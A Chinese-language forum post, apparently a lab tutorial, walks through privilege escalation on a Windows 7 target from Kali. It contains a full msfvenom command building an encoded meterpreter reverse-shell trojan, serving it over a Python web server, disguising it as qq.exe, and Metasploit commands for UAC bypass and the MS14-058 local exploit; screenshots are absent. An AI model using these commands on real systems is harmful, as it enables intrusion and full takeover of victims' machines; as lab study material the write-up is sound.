电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 3959 人浏览分享

三种方式内网提权

[复制链接]
3959 0
环境 攻击机kali2020        ip:192.168.233.133/24
        靶机 win7(32位)       ip:192.168.233.132/24

权限提升方式
1提高程序运行级别
2UAC绕过
3利用本地提权漏洞进行提权

肉鸡上线,拿到用户权限

1攻击机生成木马(msf.exe)
msfVENOM -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.233.133
LPORT=4444 -b"\x00" -e x86/shikata_ga_nai -f exe >msf.exe

173507kqhp35735zq5hq60.png

2攻击机配置监听脚本

91.png

3攻击机使用python,开启简单的http server,通过web服务来传送木马
(python -m SimpleHTTPServer 888)

89.png

4win7靶机通过浏览器下载木马,并运行

88.png

87.png

5攻击机弹出meterpreter回话,查看权限是用户权限,提升到系统权限失败

86.png

二提权(提升到系统权限)
1提高程序运行级别  使用msf模块(exploit/windows/local/ask) 使用高权限来运行msf.exe
并把msf.exe伪装成qq.exe

82.png

2在靶机上点是(Y),以高权限来运行qq.exe

81.png

3靶机以高权限运行qq.exe后,在攻击机上返回新的session(session2)

80.png

4进入session2 并提权发现可以成功提到系统权限

79.png

三bypass UAC提权
1在攻击机上进入bypassuac模块,show options 查看配置

78.png

2选择低权限的会话session1 (set session 1) 后exploit,发现生成新的session3

77.png
76.png

3进入session3 (sessions -i 3)并提权,成为系统权限

75.png

四 利用本地提权漏洞进行提权
1 use exploit/windows/local/ms14_058_track_popup_menu ,进入模块后选择低权限的session
(set session 1)并运行模块,发现生成新的session 4 ,并且session 4为系统权限。

29.png
28.png

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.